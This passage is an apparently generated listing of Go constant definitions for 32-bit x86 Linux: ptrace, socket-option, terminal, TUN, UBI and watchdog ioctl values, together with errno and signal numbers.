0xffffffff constant PTRACE_GETFPREGS (line 232) | PTRACE_GETFPREGS = 0xe constant PTRACE_GETFPXREGS (line 233) | PTRACE_GETFPXREGS = 0x12 constant PTRACE_GET_THREAD_AREA (line 234) | PTRACE_GET_THREAD_AREA = 0x19 constant PTRACE_OLDSETOPTIONS (line 235) | PTRACE_OLDSETOPTIONS = 0x15 constant PTRACE_SETFPREGS (line 236) | PTRACE_SETFPREGS = 0xf constant PTRACE_SETFPXREGS (line 237) | PTRACE_SETFPXREGS = 0x13 constant PTRACE_SET_THREAD_AREA (line 238) | PTRACE_SET_THREAD_AREA = 0x1a constant PTRACE_SINGLEBLOCK (line 239) | PTRACE_SINGLEBLOCK = 0x21 constant PTRACE_SYSEMU (line 240) | PTRACE_SYSEMU = 0x1f constant PTRACE_SYSEMU_SINGLESTEP (line 241) | PTRACE_SYSEMU_SINGLESTEP = 0x20 constant RLIMIT_AS (line 242) | RLIMIT_AS = 0x9 constant RLIMIT_MEMLOCK (line 243) | RLIMIT_MEMLOCK = 0x8 constant RLIMIT_NOFILE (line 244) | RLIMIT_NOFILE = 0x7 constant RLIMIT_NPROC (line 245) | RLIMIT_NPROC = 0x6 constant RLIMIT_RSS (line 246) | RLIMIT_RSS = 0x5 constant RNDADDENTROPY (line 247) | RNDADDENTROPY = 0x40085203 constant RNDADDTOENTCNT (line 248) | RNDADDTOENTCNT = 0x40045201 constant RNDCLEARPOOL (line 249) | RNDCLEARPOOL = 0x5206 constant RNDGETENTCNT (line 250) | RNDGETENTCNT = 0x80045200 constant RNDGETPOOL (line 251) | RNDGETPOOL = 0x80085202 constant RNDRESEEDCRNG (line 252) | RNDRESEEDCRNG = 0x5207 constant RNDZAPENTCNT (line 253) | RNDZAPENTCNT = 0x5204 constant RTC_AIE_OFF (line 254) | RTC_AIE_OFF = 0x7002 constant RTC_AIE_ON (line 255) | RTC_AIE_ON = 0x7001 constant RTC_ALM_READ (line 256) | RTC_ALM_READ = 0x80247008 constant RTC_ALM_SET (line 257) | RTC_ALM_SET = 0x40247007 constant RTC_EPOCH_READ (line 258) | RTC_EPOCH_READ = 0x8004700d constant RTC_EPOCH_SET (line 259) | RTC_EPOCH_SET = 0x4004700e constant RTC_IRQP_READ (line 260) | RTC_IRQP_READ = 0x8004700b constant RTC_IRQP_SET (line 261) | RTC_IRQP_SET = 0x4004700c constant RTC_PARAM_GET (line 262) | RTC_PARAM_GET = 0x40187013 constant RTC_PARAM_SET (line 263) | RTC_PARAM_SET = 0x40187014 constant RTC_PIE_OFF (line 264) | RTC_PIE_OFF = 0x7006 constant RTC_PIE_ON (line 265) | RTC_PIE_ON = 0x7005 constant RTC_PLL_GET (line 266) | RTC_PLL_GET = 0x801c7011 constant RTC_PLL_SET (line 267) | RTC_PLL_SET = 0x401c7012 constant RTC_RD_TIME (line 268) | RTC_RD_TIME = 0x80247009 constant RTC_SET_TIME (line 269) | RTC_SET_TIME = 0x4024700a constant RTC_UIE_OFF (line 270) | RTC_UIE_OFF = 0x7004 constant RTC_UIE_ON (line 271) | RTC_UIE_ON = 0x7003 constant RTC_VL_CLR (line 272) | RTC_VL_CLR = 0x7014 constant RTC_VL_READ (line 273) | RTC_VL_READ = 0x80047013 constant RTC_WIE_OFF (line 274) | RTC_WIE_OFF = 0x7010 constant RTC_WIE_ON (line 275) | RTC_WIE_ON = 0x700f constant RTC_WKALM_RD (line 276) | RTC_WKALM_RD = 0x80287010 constant RTC_WKALM_SET (line 277) | RTC_WKALM_SET = 0x4028700f constant SCM_TIMESTAMPING (line 278) | SCM_TIMESTAMPING = 0x25 constant SCM_TIMESTAMPING_OPT_STATS (line 279) | SCM_TIMESTAMPING_OPT_STATS = 0x36 constant SCM_TIMESTAMPING_PKTINFO (line 280) | SCM_TIMESTAMPING_PKTINFO = 0x3a constant SCM_TIMESTAMPNS (line 281) | SCM_TIMESTAMPNS = 0x23 constant SCM_TXTIME (line 282) | SCM_TXTIME = 0x3d constant SCM_WIFI_STATUS (line 283) | SCM_WIFI_STATUS = 0x29 constant SECCOMP_IOCTL_NOTIF_ADDFD (line 284) | SECCOMP_IOCTL_NOTIF_ADDFD = 0x40182103 constant SECCOMP_IOCTL_NOTIF_ID_VALID (line 285) | SECCOMP_IOCTL_NOTIF_ID_VALID = 0x40082102 constant SECCOMP_IOCTL_NOTIF_SET_FLAGS (line 286) | SECCOMP_IOCTL_NOTIF_SET_FLAGS = 0x40082104 constant SFD_CLOEXEC (line 287) | SFD_CLOEXEC = 0x80000 constant SFD_NONBLOCK (line 288) | SFD_NONBLOCK = 0x800 constant SIOCATMARK (line 289) | SIOCATMARK = 0x8905 constant SIOCGPGRP (line 290) | SIOCGPGRP = 0x8904 constant SIOCGSTAMPNS_NEW (line 291) | SIOCGSTAMPNS_NEW = 0x80108907 constant SIOCGSTAMP_NEW (line 292) | SIOCGSTAMP_NEW = 0x80108906 constant SIOCINQ (line 293) | SIOCINQ = 0x541b constant SIOCOUTQ (line 294) | SIOCOUTQ = 0x5411 constant SIOCSPGRP (line 295) | SIOCSPGRP = 0x8902 constant SOCK_CLOEXEC (line 296) | SOCK_CLOEXEC = 0x80000 constant SOCK_DGRAM (line 297) | SOCK_DGRAM = 0x2 constant SOCK_NONBLOCK (line 298) | SOCK_NONBLOCK = 0x800 constant SOCK_STREAM (line 299) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 300) | SOL_SOCKET = 0x1 constant SO_ACCEPTCONN (line 301) | SO_ACCEPTCONN = 0x1e constant SO_ATTACH_BPF (line 302) | SO_ATTACH_BPF = 0x32 constant SO_ATTACH_REUSEPORT_CBPF (line 303) | SO_ATTACH_REUSEPORT_CBPF = 0x33 constant SO_ATTACH_REUSEPORT_EBPF (line 304) | SO_ATTACH_REUSEPORT_EBPF = 0x34 constant SO_BINDTODEVICE (line 305) | SO_BINDTODEVICE = 0x19 constant SO_BINDTOIFINDEX (line 306) | SO_BINDTOIFINDEX = 0x3e constant SO_BPF_EXTENSIONS (line 307) | SO_BPF_EXTENSIONS = 0x30 constant SO_BROADCAST (line 308) | SO_BROADCAST = 0x6 constant SO_BSDCOMPAT (line 309) | SO_BSDCOMPAT = 0xe constant SO_BUF_LOCK (line 310) | SO_BUF_LOCK = 0x48 constant SO_BUSY_POLL (line 311) | SO_BUSY_POLL = 0x2e constant SO_BUSY_POLL_BUDGET (line 312) | SO_BUSY_POLL_BUDGET = 0x46 constant SO_CNX_ADVICE (line 313) | SO_CNX_ADVICE = 0x35 constant SO_COOKIE (line 314) | SO_COOKIE = 0x39 constant SO_DETACH_REUSEPORT_BPF (line 315) | SO_DETACH_REUSEPORT_BPF = 0x44 constant SO_DOMAIN (line 316) | SO_DOMAIN = 0x27 constant SO_DONTROUTE (line 317) | SO_DONTROUTE = 0x5 constant SO_ERROR (line 318) | SO_ERROR = 0x4 constant SO_INCOMING_CPU (line 319) | SO_INCOMING_CPU = 0x31 constant SO_INCOMING_NAPI_ID (line 320) | SO_INCOMING_NAPI_ID = 0x38 constant SO_KEEPALIVE (line 321) | SO_KEEPALIVE = 0x9 constant SO_LINGER (line 322) | SO_LINGER = 0xd constant SO_LOCK_FILTER (line 323) | SO_LOCK_FILTER = 0x2c constant SO_MARK (line 324) | SO_MARK = 0x24 constant SO_MAX_PACING_RATE (line 325) | SO_MAX_PACING_RATE = 0x2f constant SO_MEMINFO (line 326) | SO_MEMINFO = 0x37 constant SO_NETNS_COOKIE (line 327) | SO_NETNS_COOKIE = 0x47 constant SO_NOFCS (line 328) | SO_NOFCS = 0x2b constant SO_OOBINLINE (line 329) | SO_OOBINLINE = 0xa constant SO_PASSCRED (line 330) | SO_PASSCRED = 0x10 constant SO_PASSPIDFD (line 331) | SO_PASSPIDFD = 0x4c constant SO_PASSSEC (line 332) | SO_PASSSEC = 0x22 constant SO_PEEK_OFF (line 333) | SO_PEEK_OFF = 0x2a constant SO_PEERCRED (line 334) | SO_PEERCRED = 0x11 constant SO_PEERGROUPS (line 335) | SO_PEERGROUPS = 0x3b constant SO_PEERPIDFD (line 336) | SO_PEERPIDFD = 0x4d constant SO_PEERSEC (line 337) | SO_PEERSEC = 0x1f constant SO_PREFER_BUSY_POLL (line 338) | SO_PREFER_BUSY_POLL = 0x45 constant SO_PROTOCOL (line 339) | SO_PROTOCOL = 0x26 constant SO_RCVBUF (line 340) | SO_RCVBUF = 0x8 constant SO_RCVBUFFORCE (line 341) | SO_RCVBUFFORCE = 0x21 constant SO_RCVLOWAT (line 342) | SO_RCVLOWAT = 0x12 constant SO_RCVMARK (line 343) | SO_RCVMARK = 0x4b constant SO_RCVTIMEO (line 344) | SO_RCVTIMEO = 0x14 constant SO_RCVTIMEO_NEW (line 345) | SO_RCVTIMEO_NEW = 0x42 constant SO_RCVTIMEO_OLD (line 346) | SO_RCVTIMEO_OLD = 0x14 constant SO_RESERVE_MEM (line 347) | SO_RESERVE_MEM = 0x49 constant SO_REUSEADDR (line 348) | SO_REUSEADDR = 0x2 constant SO_REUSEPORT (line 349) | SO_REUSEPORT = 0xf constant SO_RXQ_OVFL (line 350) | SO_RXQ_OVFL = 0x28 constant SO_SECURITY_AUTHENTICATION (line 351) | SO_SECURITY_AUTHENTICATION = 0x16 constant SO_SECURITY_ENCRYPTION_NETWORK (line 352) | SO_SECURITY_ENCRYPTION_NETWORK = 0x18 constant SO_SECURITY_ENCRYPTION_TRANSPORT (line 353) | SO_SECURITY_ENCRYPTION_TRANSPORT = 0x17 constant SO_SELECT_ERR_QUEUE (line 354) | SO_SELECT_ERR_QUEUE = 0x2d constant SO_SNDBUF (line 355) | SO_SNDBUF = 0x7 constant SO_SNDBUFFORCE (line 356) | SO_SNDBUFFORCE = 0x20 constant SO_SNDLOWAT (line 357) | SO_SNDLOWAT = 0x13 constant SO_SNDTIMEO (line 358) | SO_SNDTIMEO = 0x15 constant SO_SNDTIMEO_NEW (line 359) | SO_SNDTIMEO_NEW = 0x43 constant SO_SNDTIMEO_OLD (line 360) | SO_SNDTIMEO_OLD = 0x15 constant SO_TIMESTAMPING (line 361) | SO_TIMESTAMPING = 0x25 constant SO_TIMESTAMPING_NEW (line 362) | SO_TIMESTAMPING_NEW = 0x41 constant SO_TIMESTAMPING_OLD (line 363) | SO_TIMESTAMPING_OLD = 0x25 constant SO_TIMESTAMPNS (line 364) | SO_TIMESTAMPNS = 0x23 constant SO_TIMESTAMPNS_NEW (line 365) | SO_TIMESTAMPNS_NEW = 0x40 constant SO_TIMESTAMPNS_OLD (line 366) | SO_TIMESTAMPNS_OLD = 0x23 constant SO_TIMESTAMP_NEW (line 367) | SO_TIMESTAMP_NEW = 0x3f constant SO_TXREHASH (line 368) | SO_TXREHASH = 0x4a constant SO_TXTIME (line 369) | SO_TXTIME = 0x3d constant SO_TYPE (line 370) | SO_TYPE = 0x3 constant SO_WIFI_STATUS (line 371) | SO_WIFI_STATUS = 0x29 constant SO_ZEROCOPY (line 372) | SO_ZEROCOPY = 0x3c constant TAB1 (line 373) | TAB1 = 0x800 constant TAB2 (line 374) | TAB2 = 0x1000 constant TAB3 (line 375) | TAB3 = 0x1800 constant TABDLY (line 376) | TABDLY = 0x1800 constant TCFLSH (line 377) | TCFLSH = 0x540b constant TCGETA (line 378) | TCGETA = 0x5405 constant TCGETS (line 379) | TCGETS = 0x5401 constant TCGETS2 (line 380) | TCGETS2 = 0x802c542a constant TCGETX (line 381) | TCGETX = 0x5432 constant TCSAFLUSH (line 382) | TCSAFLUSH = 0x2 constant TCSBRK (line 383) | TCSBRK = 0x5409 constant TCSBRKP (line 384) | TCSBRKP = 0x5425 constant TCSETA (line 385) | TCSETA = 0x5406 constant TCSETAF (line 386) | TCSETAF = 0x5408 constant TCSETAW (line 387) | TCSETAW = 0x5407 constant TCSETS (line 388) | TCSETS = 0x5402 constant TCSETS2 (line 389) | TCSETS2 = 0x402c542b constant TCSETSF (line 390) | TCSETSF = 0x5404 constant TCSETSF2 (line 391) | TCSETSF2 = 0x402c542d constant TCSETSW (line 392) | TCSETSW = 0x5403 constant TCSETSW2 (line 393) | TCSETSW2 = 0x402c542c constant TCSETX (line 394) | TCSETX = 0x5433 constant TCSETXF (line 395) | TCSETXF = 0x5434 constant TCSETXW (line 396) | TCSETXW = 0x5435 constant TCXONC (line 397) | TCXONC = 0x540a constant TFD_CLOEXEC (line 398) | TFD_CLOEXEC = 0x80000 constant TFD_NONBLOCK (line 399) | TFD_NONBLOCK = 0x800 constant TIOCCBRK (line 400) | TIOCCBRK = 0x5428 constant TIOCCONS (line 401) | TIOCCONS = 0x541d constant TIOCEXCL (line 402) | TIOCEXCL = 0x540c constant TIOCGDEV (line 403) | TIOCGDEV = 0x80045432 constant TIOCGETD (line 404) | TIOCGETD = 0x5424 constant TIOCGEXCL (line 405) | TIOCGEXCL = 0x80045440 constant TIOCGICOUNT (line 406) | TIOCGICOUNT = 0x545d constant TIOCGISO7816 (line 407) | TIOCGISO7816 = 0x80285442 constant TIOCGLCKTRMIOS (line 408) | TIOCGLCKTRMIOS = 0x5456 constant TIOCGPGRP (line 409) | TIOCGPGRP = 0x540f constant TIOCGPKT (line 410) | TIOCGPKT = 0x80045438 constant TIOCGPTLCK (line 411) | TIOCGPTLCK = 0x80045439 constant TIOCGPTN (line 412) | TIOCGPTN = 0x80045430 constant TIOCGPTPEER (line 413) | TIOCGPTPEER = 0x5441 constant TIOCGRS485 (line 414) | TIOCGRS485 = 0x542e constant TIOCGSERIAL (line 415) | TIOCGSERIAL = 0x541e constant TIOCGSID (line 416) | TIOCGSID = 0x5429 constant TIOCGSOFTCAR (line 417) | TIOCGSOFTCAR = 0x5419 constant TIOCGWINSZ (line 418) | TIOCGWINSZ = 0x5413 constant TIOCINQ (line 419) | TIOCINQ = 0x541b constant TIOCLINUX (line 420) | TIOCLINUX = 0x541c constant TIOCMBIC (line 421) | TIOCMBIC = 0x5417 constant TIOCMBIS (line 422) | TIOCMBIS = 0x5416 constant TIOCMGET (line 423) | TIOCMGET = 0x5415 constant TIOCMIWAIT (line 424) | TIOCMIWAIT = 0x545c constant TIOCMSET (line 425) | TIOCMSET = 0x5418 constant TIOCM_CAR (line 426) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 427) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 428) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 429) | TIOCM_DSR = 0x100 constant TIOCM_RI (line 430) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 431) | TIOCM_RNG = 0x80 constant TIOCM_SR (line 432) | TIOCM_SR = 0x10 constant TIOCM_ST (line 433) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 434) | TIOCNOTTY = 0x5422 constant TIOCNXCL (line 435) | TIOCNXCL = 0x540d constant TIOCOUTQ (line 436) | TIOCOUTQ = 0x5411 constant TIOCPKT (line 437) | TIOCPKT = 0x5420 constant TIOCSBRK (line 438) | TIOCSBRK = 0x5427 constant TIOCSCTTY (line 439) | TIOCSCTTY = 0x540e constant TIOCSERCONFIG (line 440) | TIOCSERCONFIG = 0x5453 constant TIOCSERGETLSR (line 441) | TIOCSERGETLSR = 0x5459 constant TIOCSERGETMULTI (line 442) | TIOCSERGETMULTI = 0x545a constant TIOCSERGSTRUCT (line 443) | TIOCSERGSTRUCT = 0x5458 constant TIOCSERGWILD (line 444) | TIOCSERGWILD = 0x5454 constant TIOCSERSETMULTI (line 445) | TIOCSERSETMULTI = 0x545b constant TIOCSERSWILD (line 446) | TIOCSERSWILD = 0x5455 constant TIOCSER_TEMT (line 447) | TIOCSER_TEMT = 0x1 constant TIOCSETD (line 448) | TIOCSETD = 0x5423 constant TIOCSIG (line 449) | TIOCSIG = 0x40045436 constant TIOCSISO7816 (line 450) | TIOCSISO7816 = 0xc0285443 constant TIOCSLCKTRMIOS (line 451) | TIOCSLCKTRMIOS = 0x5457 constant TIOCSPGRP (line 452) | TIOCSPGRP = 0x5410 constant TIOCSPTLCK (line 453) | TIOCSPTLCK = 0x40045431 constant TIOCSRS485 (line 454) | TIOCSRS485 = 0x542f constant TIOCSSERIAL (line 455) | TIOCSSERIAL = 0x541f constant TIOCSSOFTCAR (line 456) | TIOCSSOFTCAR = 0x541a constant TIOCSTI (line 457) | TIOCSTI = 0x5412 constant TIOCSWINSZ (line 458) | TIOCSWINSZ = 0x5414 constant TIOCVHANGUP (line 459) | TIOCVHANGUP = 0x5437 constant TOSTOP (line 460) | TOSTOP = 0x100 constant TUNATTACHFILTER (line 461) | TUNATTACHFILTER = 0x400854d5 constant TUNDETACHFILTER (line 462) | TUNDETACHFILTER = 0x400854d6 constant TUNGETDEVNETNS (line 463) | TUNGETDEVNETNS = 0x54e3 constant TUNGETFEATURES (line 464) | TUNGETFEATURES = 0x800454cf constant TUNGETFILTER (line 465) | TUNGETFILTER = 0x800854db constant TUNGETIFF (line 466) | TUNGETIFF = 0x800454d2 constant TUNGETSNDBUF (line 467) | TUNGETSNDBUF = 0x800454d3 constant TUNGETVNETBE (line 468) | TUNGETVNETBE = 0x800454df constant TUNGETVNETHDRSZ (line 469) | TUNGETVNETHDRSZ = 0x800454d7 constant TUNGETVNETLE (line 470) | TUNGETVNETLE = 0x800454dd constant TUNSETCARRIER (line 471) | TUNSETCARRIER = 0x400454e2 constant TUNSETDEBUG (line 472) | TUNSETDEBUG = 0x400454c9 constant TUNSETFILTEREBPF (line 473) | TUNSETFILTEREBPF = 0x800454e1 constant TUNSETGROUP (line 474) | TUNSETGROUP = 0x400454ce constant TUNSETIFF (line 475) | TUNSETIFF = 0x400454ca constant TUNSETIFINDEX (line 476) | TUNSETIFINDEX = 0x400454da constant TUNSETLINK (line 477) | TUNSETLINK = 0x400454cd constant TUNSETNOCSUM (line 478) | TUNSETNOCSUM = 0x400454c8 constant TUNSETOFFLOAD (line 479) | TUNSETOFFLOAD = 0x400454d0 constant TUNSETOWNER (line 480) | TUNSETOWNER = 0x400454cc constant TUNSETPERSIST (line 481) | TUNSETPERSIST = 0x400454cb constant TUNSETQUEUE (line 482) | TUNSETQUEUE = 0x400454d9 constant TUNSETSNDBUF (line 483) | TUNSETSNDBUF = 0x400454d4 constant TUNSETSTEERINGEBPF (line 484) | TUNSETSTEERINGEBPF = 0x800454e0 constant TUNSETTXFILTER (line 485) | TUNSETTXFILTER = 0x400454d1 constant TUNSETVNETBE (line 486) | TUNSETVNETBE = 0x400454de constant TUNSETVNETHDRSZ (line 487) | TUNSETVNETHDRSZ = 0x400454d8 constant TUNSETVNETLE (line 488) | TUNSETVNETLE = 0x400454dc constant UBI_IOCATT (line 489) | UBI_IOCATT = 0x40186f40 constant UBI_IOCDET (line 490) | UBI_IOCDET = 0x40046f41 constant UBI_IOCEBCH (line 491) | UBI_IOCEBCH = 0x40044f02 constant UBI_IOCEBER (line 492) | UBI_IOCEBER = 0x40044f01 constant UBI_IOCEBISMAP (line 493) | UBI_IOCEBISMAP = 0x80044f05 constant UBI_IOCEBMAP (line 494) | UBI_IOCEBMAP = 0x40084f03 constant UBI_IOCEBUNMAP (line 495) | UBI_IOCEBUNMAP = 0x40044f04 constant UBI_IOCMKVOL (line 496) | UBI_IOCMKVOL = 0x40986f00 constant UBI_IOCRMVOL (line 497) | UBI_IOCRMVOL = 0x40046f01 constant UBI_IOCRNVOL (line 498) | UBI_IOCRNVOL = 0x51106f03 constant UBI_IOCRPEB (line 499) | UBI_IOCRPEB = 0x40046f04 constant UBI_IOCRSVOL (line 500) | UBI_IOCRSVOL = 0x400c6f02 constant UBI_IOCSETVOLPROP (line 501) | UBI_IOCSETVOLPROP = 0x40104f06 constant UBI_IOCSPEB (line 502) | UBI_IOCSPEB = 0x40046f05 constant UBI_IOCVOLCRBLK (line 503) | UBI_IOCVOLCRBLK = 0x40804f07 constant UBI_IOCVOLRMBLK (line 504) | UBI_IOCVOLRMBLK = 0x4f08 constant UBI_IOCVOLUP (line 505) | UBI_IOCVOLUP = 0x40084f00 constant VDISCARD (line 506) | VDISCARD = 0xd constant VEOF (line 507) | VEOF = 0x4 constant VEOL (line 508) | VEOL = 0xb constant VEOL2 (line 509) | VEOL2 = 0x10 constant VMIN (line 510) | VMIN = 0x6 constant VREPRINT (line 511) | VREPRINT = 0xc constant VSTART (line 512) | VSTART = 0x8 constant VSTOP (line 513) | VSTOP = 0x9 constant VSUSP (line 514) | VSUSP = 0xa constant VSWTC (line 515) | VSWTC = 0x7 constant VT1 (line 516) | VT1 = 0x4000 constant VTDLY (line 517) | VTDLY = 0x4000 constant VTIME (line 518) | VTIME = 0x5 constant VWERASE (line 519) | VWERASE = 0xe constant WDIOC_GETBOOTSTATUS (line 520) | WDIOC_GETBOOTSTATUS = 0x80045702 constant WDIOC_GETPRETIMEOUT (line 521) | WDIOC_GETPRETIMEOUT = 0x80045709 constant WDIOC_GETSTATUS (line 522) | WDIOC_GETSTATUS = 0x80045701 constant WDIOC_GETSUPPORT (line 523) | WDIOC_GETSUPPORT = 0x80285700 constant WDIOC_GETTEMP (line 524) | WDIOC_GETTEMP = 0x80045703 constant WDIOC_GETTIMELEFT (line 525) | WDIOC_GETTIMELEFT = 0x8004570a constant WDIOC_GETTIMEOUT (line 526) | WDIOC_GETTIMEOUT = 0x80045707 constant WDIOC_KEEPALIVE (line 527) | WDIOC_KEEPALIVE = 0x80045705 constant WDIOC_SETOPTIONS (line 528) | WDIOC_SETOPTIONS = 0x80045704 constant WORDSIZE (line 529) | WORDSIZE = 0x20 constant X86_FXSR_MAGIC (line 530) | X86_FXSR_MAGIC = 0x0 constant XCASE (line 531) | XCASE = 0x4 constant XTABS (line 532) | XTABS = 0x1800 constant _HIDIOCGRAWNAME (line 533) | _HIDIOCGRAWNAME = 0x80804804 constant _HIDIOCGRAWPHYS (line 534) | _HIDIOCGRAWPHYS = 0x80404805 constant _HIDIOCGRAWUNIQ (line 535) | _HIDIOCGRAWUNIQ = 0x80404808 constant EADDRINUSE (line 540) | EADDRINUSE = syscall.Errno(0x62) constant EADDRNOTAVAIL (line 541) | EADDRNOTAVAIL = syscall.Errno(0x63) constant EADV (line 542) | EADV = syscall.Errno(0x44) constant EAFNOSUPPORT (line 543) | EAFNOSUPPORT = syscall.Errno(0x61) constant EALREADY (line 544) | EALREADY = syscall.Errno(0x72) constant EBADE (line 545) | EBADE = syscall.Errno(0x34) constant EBADFD (line 546) | EBADFD = syscall.Errno(0x4d) constant EBADMSG (line 547) | EBADMSG = syscall.Errno(0x4a) constant EBADR (line 548) | EBADR = syscall.Errno(0x35) constant EBADRQC (line 549) | EBADRQC = syscall.Errno(0x38) constant EBADSLT (line 550) | EBADSLT = syscall.Errno(0x39) constant EBFONT (line 551) | EBFONT = syscall.Errno(0x3b) constant ECANCELED (line 552) | ECANCELED = syscall.Errno(0x7d) constant ECHRNG (line 553) | ECHRNG = syscall.Errno(0x2c) constant ECOMM (line 554) | ECOMM = syscall.Errno(0x46) constant ECONNABORTED (line 555) | ECONNABORTED = syscall.Errno(0x67) constant ECONNREFUSED (line 556) | ECONNREFUSED = syscall.Errno(0x6f) constant ECONNRESET (line 557) | ECONNRESET = syscall.Errno(0x68) constant EDEADLK (line 558) | EDEADLK = syscall.Errno(0x23) constant EDEADLOCK (line 559) | EDEADLOCK = syscall.Errno(0x23) constant EDESTADDRREQ (line 560) | EDESTADDRREQ = syscall.Errno(0x59) constant EDOTDOT (line 561) | EDOTDOT = syscall.Errno(0x49) constant EDQUOT (line 562) | EDQUOT = syscall.Errno(0x7a) constant EHOSTDOWN (line 563) | EHOSTDOWN = syscall.Errno(0x70) constant EHOSTUNREACH (line 564) | EHOSTUNREACH = syscall.Errno(0x71) constant EHWPOISON (line 565) | EHWPOISON = syscall.Errno(0x85) constant EIDRM (line 566) | EIDRM = syscall.Errno(0x2b) constant EILSEQ (line 567) | EILSEQ = syscall.Errno(0x54) constant EINPROGRESS (line 568) | EINPROGRESS = syscall.Errno(0x73) constant EISCONN (line 569) | EISCONN = syscall.Errno(0x6a) constant EISNAM (line 570) | EISNAM = syscall.Errno(0x78) constant EKEYEXPIRED (line 571) | EKEYEXPIRED = syscall.Errno(0x7f) constant EKEYREJECTED (line 572) | EKEYREJECTED = syscall.Errno(0x81) constant EKEYREVOKED (line 573) | EKEYREVOKED = syscall.Errno(0x80) constant EL2HLT (line 574) | EL2HLT = syscall.Errno(0x33) constant EL2NSYNC (line 575) | EL2NSYNC = syscall.Errno(0x2d) constant EL3HLT (line 576) | EL3HLT = syscall.Errno(0x2e) constant EL3RST (line 577) | EL3RST = syscall.Errno(0x2f) constant ELIBACC (line 578) | ELIBACC = syscall.Errno(0x4f) constant ELIBBAD (line 579) | ELIBBAD = syscall.Errno(0x50) constant ELIBEXEC (line 580) | ELIBEXEC = syscall.Errno(0x53) constant ELIBMAX (line 581) | ELIBMAX = syscall.Errno(0x52) constant ELIBSCN (line 582) | ELIBSCN = syscall.Errno(0x51) constant ELNRNG (line 583) | ELNRNG = syscall.Errno(0x30) constant ELOOP (line 584) | ELOOP = syscall.Errno(0x28) constant EMEDIUMTYPE (line 585) | EMEDIUMTYPE = syscall.Errno(0x7c) constant EMSGSIZE (line 586) | EMSGSIZE = syscall.Errno(0x5a) constant EMULTIHOP (line 587) | EMULTIHOP = syscall.Errno(0x48) constant ENAMETOOLONG (line 588) | ENAMETOOLONG = syscall.Errno(0x24) constant ENAVAIL (line 589) | ENAVAIL = syscall.Errno(0x77) constant ENETDOWN (line 590) | ENETDOWN = syscall.Errno(0x64) constant ENETRESET (line 591) | ENETRESET = syscall.Errno(0x66) constant ENETUNREACH (line 592) | ENETUNREACH = syscall.Errno(0x65) constant ENOANO (line 593) | ENOANO = syscall.Errno(0x37) constant ENOBUFS (line 594) | ENOBUFS = syscall.Errno(0x69) constant ENOCSI (line 595) | ENOCSI = syscall.Errno(0x32) constant ENODATA (line 596) | ENODATA = syscall.Errno(0x3d) constant ENOKEY (line 597) | ENOKEY = syscall.Errno(0x7e) constant ENOLCK (line 598) | ENOLCK = syscall.Errno(0x25) constant ENOLINK (line 599) | ENOLINK = syscall.Errno(0x43) constant ENOMEDIUM (line 600) | ENOMEDIUM = syscall.Errno(0x7b) constant ENOMSG (line 601) | ENOMSG = syscall.Errno(0x2a) constant ENONET (line 602) | ENONET = syscall.Errno(0x40) constant ENOPKG (line 603) | ENOPKG = syscall.Errno(0x41) constant ENOPROTOOPT (line 604) | ENOPROTOOPT = syscall.Errno(0x5c) constant ENOSR (line 605) | ENOSR = syscall.Errno(0x3f) constant ENOSTR (line 606) | ENOSTR = syscall.Errno(0x3c) constant ENOSYS (line 607) | ENOSYS = syscall.Errno(0x26) constant ENOTCONN (line 608) | ENOTCONN = syscall.Errno(0x6b) constant ENOTEMPTY (line 609) | ENOTEMPTY = syscall.Errno(0x27) constant ENOTNAM (line 610) | ENOTNAM = syscall.Errno(0x76) constant ENOTRECOVERABLE (line 611) | ENOTRECOVERABLE = syscall.Errno(0x83) constant ENOTSOCK (line 612) | ENOTSOCK = syscall.Errno(0x58) constant ENOTSUP (line 613) | ENOTSUP = syscall.Errno(0x5f) constant ENOTUNIQ (line 614) | ENOTUNIQ = syscall.Errno(0x4c) constant EOPNOTSUPP (line 615) | EOPNOTSUPP = syscall.Errno(0x5f) constant EOVERFLOW (line 616) | EOVERFLOW = syscall.Errno(0x4b) constant EOWNERDEAD (line 617) | EOWNERDEAD = syscall.Errno(0x82) constant EPFNOSUPPORT (line 618) | EPFNOSUPPORT = syscall.Errno(0x60) constant EPROTO (line 619) | EPROTO = syscall.Errno(0x47) constant EPROTONOSUPPORT (line 620) | EPROTONOSUPPORT = syscall.Errno(0x5d) constant EPROTOTYPE (line 621) | EPROTOTYPE = syscall.Errno(0x5b) constant EREMCHG (line 622) | EREMCHG = syscall.Errno(0x4e) constant EREMOTE (line 623) | EREMOTE = syscall.Errno(0x42) constant EREMOTEIO (line 624) | EREMOTEIO = syscall.Errno(0x79) constant ERESTART (line 625) | ERESTART = syscall.Errno(0x55) constant ERFKILL (line 626) | ERFKILL = syscall.Errno(0x84) constant ESHUTDOWN (line 627) | ESHUTDOWN = syscall.Errno(0x6c) constant ESOCKTNOSUPPORT (line 628) | ESOCKTNOSUPPORT = syscall.Errno(0x5e) constant ESRMNT (line 629) | ESRMNT = syscall.Errno(0x45) constant ESTALE (line 630) | ESTALE = syscall.Errno(0x74) constant ESTRPIPE (line 631) | ESTRPIPE = syscall.Errno(0x56) constant ETIME (line 632) | ETIME = syscall.Errno(0x3e) constant ETIMEDOUT (line 633) | ETIMEDOUT = syscall.Errno(0x6e) constant ETOOMANYREFS (line 634) | ETOOMANYREFS = syscall.Errno(0x6d) constant EUCLEAN (line 635) | EUCLEAN = syscall.Errno(0x75) constant EUNATCH (line 636) | EUNATCH = syscall.Errno(0x31) constant EUSERS (line 637) | EUSERS = syscall.Errno(0x57) constant EXFULL (line 638) | EXFULL = syscall.Errno(0x36) constant SIGBUS (line 643) | SIGBUS = syscall.Signal(0x7) constant SIGCHLD (line 644) | SIGCHLD = syscall.Signal(0x11) constant SIGCLD (line 645) | SIGCLD = syscall.Signal(0x11) constant SIGCONT (line 646) | SIGCONT = syscall.Signal(0x12) constant SIGIO (line 647) | SIGIO = syscall.Signal(0x1d) constant SIGPOLL (line 648) | SIGPOLL = syscall.Signal(0x1d) constant SIGPROF (line 649) | SIGPROF = syscall.Signal(0x1b) constant SIGPWR (line 650) | SIGPWR = syscall.Signal(0x1e) constant SIGSTKFLT (line 651) | SIGSTKFLT = syscall.Signal(0x10) constant SIGSTOP (line 652) | SIGSTOP = syscall.Signal(0x13) constant SIGSYS (line 653) | SIGSYS = syscall.Signal(0x1f) constant SIGTSTP (line 654) | SIGTSTP = syscall.Signal(0x14) constant SIGTTIN (line 655) | SIGTTIN = 